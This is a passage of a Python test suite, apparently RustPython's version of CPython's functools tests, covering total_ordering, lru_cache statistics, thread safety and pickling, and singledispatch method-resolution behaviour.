def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
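# Illustrative sketch for the TestTotalOrdering cases above: total_ordering
# fills in the missing rich comparisons from __eq__ plus one ordering method.
# A minimal example, not used by the tests; the class name _DemoOrderable is
# illustrative only.
@functools.total_ordering
class _DemoOrderable:
    def __init__(self, value):
        self.value = value
    def __eq__(self, other):
        return self.value == other.value
    def __lt__(self, other):
        return self.value < other.value
    # __le__, __gt__ and __ge__ are synthesized by the decorator, so e.g.
    # _DemoOrderable(1) >= _DemoOrderable(1) evaluates to True.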
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
        # This caused the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
        # LRU cache guarantees that it will call __hash__ at most
        # once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
                    # XXX: Why can these be unequal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
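# Illustrative sketch for the TestLRU cases above: cache_info() reports
# (hits, misses, maxsize, currsize) and cache_clear() resets the counters.
# A minimal example, not used by the tests; _lru_cache_demo is illustrative
# only and assumes the standard functools.lru_cache behaviour.
def _lru_cache_demo():
    import functools as _functools
    @_functools.lru_cache(maxsize=2)
    def double(x):
        return 2 * x
    double(1)              # miss, cached
    double(1)              # hit
    double(2)              # miss, cached
    double(3)              # miss, evicts 1 (the least recently used entry)
    info = double.cache_info()   # CacheInfo(hits=1, misses=3, maxsize=2, currsize=2)
    double.cache_clear()         # counters and stored results are discarded
    return info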
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
